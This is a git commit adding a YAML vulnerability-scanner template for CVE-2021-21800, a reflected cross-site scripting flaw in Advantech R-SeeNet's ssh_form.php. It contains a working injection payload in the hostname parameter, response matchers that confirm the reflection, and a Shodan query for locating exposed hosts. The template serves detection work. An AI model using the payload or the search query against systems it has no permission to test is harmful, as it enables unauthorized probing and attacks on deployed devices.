Create CVE-2021-21800.yaml

patch-1
Arafat Ansari 2022-08-05 11:26:37 +05:30 committed by GitHub
parent 64cd216ab5
commit 0123eb7dcb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: CVE-2021-21800
info:
name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the ssh_form.php script functionality.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
metadata:
shodan-query: http.html:"R-SeeNet"
verified: "true"
tags: xss,cve,2021,unauthenticated
requests:
- method: GET
path:
- "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ctitle%3E"
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(1)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200